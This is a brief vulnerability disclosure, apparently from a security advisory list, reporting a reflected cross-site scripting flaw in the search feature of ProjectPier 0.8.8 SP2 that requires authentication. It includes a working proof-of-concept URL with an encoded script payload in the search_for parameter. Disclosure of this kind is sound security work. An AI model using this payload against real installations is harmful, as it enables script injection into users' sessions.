ProjectPier version 0.8.8 SP2 suffers from a cross site scripting vulnerability.
8405f0debc4bd59bdf121d4d4769a460a5529cb51ef81d22175d4907a68b8d03
I was doing my RASP (Runtime Application Self-Protection) module testing on
the latest version of Project Pier i.e. 0.8.8 SP2 yesterday and found an
XSS vulnerability in search.
http://<server>/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E
<http://www.prop.com/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E>
The xss occurs after authentication.
Thanks,
Jaydeep Dave